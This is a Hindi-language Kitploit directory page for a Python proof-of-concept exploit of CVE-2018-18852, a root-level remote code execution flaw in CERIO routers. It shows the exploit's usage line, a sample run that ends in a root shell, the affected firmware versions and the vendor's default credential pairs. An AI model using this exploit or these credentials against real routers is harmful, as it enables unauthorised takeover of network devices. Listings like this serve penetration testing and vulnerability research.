Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-18852 — CERIO RCE CVE-2018-18852, प्रमाणित (विक्रेता डिफ़ॉल्ट) वेब-आधारित RCE रूट उपयोगकर्ता के रूप में। | Kitploit
उपकरण/GitHubGitHub/hook-s3c/cve-2018-18852
एम्बेडेड सिस्टम सुरक्षाIoT सुरक्षापासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubhook-s3c/cve-2018-18852

CVE-2018-18852

CERIO RCE CVE-2018-18852, प्रमाणित (विक्रेता डिफ़ॉल्ट) वेब-आधारित RCE रूट उपयोगकर्ता के रूप में।

रिपॉजिटरी देखें
45167 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CERIO राउटर प्रमाणित RCE (विक्रेता बैकडोर क्रेडेंशियल्स) CVE-2018-18852 Python PoC

hook-s3c (github.com/hook-s3c), ट्विटर पर @hook_s3c

CVE-2018-18852 के लिए कार्यशील Python PoC, मूल रूप से यहाँ उपलब्ध; https://github.com/hook-s3c/CVE-2018-18852

क्या चल रहा है

CERIO राउटर के मॉडल और वेरिएंट, DT300N, DT100G, AMR-3204, WMR-200N रूट यूज़र के रूप में एक प्रमाणित वेब-आधारित RCE के प्रति संवेदनशील हैं।

यह एक गैर-प्रकट 0day एडवाइज़री के रूप में मौजूद है; https://www.fortiguard.com/zeroday/FG-VD-18-149

विक्रेता के डिफ़ॉल्ट क्रेडेंशियल आमतौर पर मौजूद होते हैं, इसलिए एक्सप्लॉइटेशन आसान है।

आर्किटेक्चर MIPS है।

उपयोग और उदाहरण

root@kitploit:~
Usage: exploit.py <ipaddress> <port> <creds>
root@kitploit:~

$ python ./exploit.py 127.0.0.1 8080 admin:admin

[*] ================================================
[*] CERIO RCE CVE-2018-18852, confirmed on;
[*] - CERIO DT-300N-NGS-M - fw: Pme-CPE-AP12X V1.0.3
[*] - CERIO DT-300N       - fw: Cen-CPE-N2H10A V1.0.14, Cen-CPE-N2H10A V1.1.6, Cen-CPE-N2H10A V1.1.7
[*] - CERIO DT-100G-N     - fw: Cen-AP-N2H10A V1.0.8
[*] - CERIO DT-100G       - fw: Cen-WR-G2H5 V1.0.7
[*] - CERIO DT-100GX-N    - fw: Cen-AP-N2H8A V1.0.18
[*] - CERIO AMR-3204G     - fw: Cen-AC V2.0.19
[*] - CERIO WMR-200N      - fw: Cen-HS-N2H1 V1.0.6c Test
[*]
[/] by hook (@hook_s3c) https://github.com/hook-s3c/CVE-2018-18852
[/] Greetz to vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, 
[/] The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee
[/] Go cop YTCracker's Introducing Neals, gov overreach is no joke - wake the fuck up
[*] ================================================

root@cerio:~# id
[!] This may not be the right model (DT-300N-NGS-M), trying again
[+] Sucessfully grabbed pid token: 1312


uid=0(root) gid=0(root)

root@cerio:~# 

डिफ़ॉल्ट क्रेडेंशियल कॉम्बो;

  • operator:1234
  • admin:admin
  • root:default

शुभकामनाएँ

इन सभी को विशेष धन्यवाद: vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee जाओ YTCracker का Introducing Neals सुनो, सरकारी अतिक्रमण कोई मज़ाक नहीं है - जाग जाओ

HTP!!!! YEET

टूल डाउनलोड करें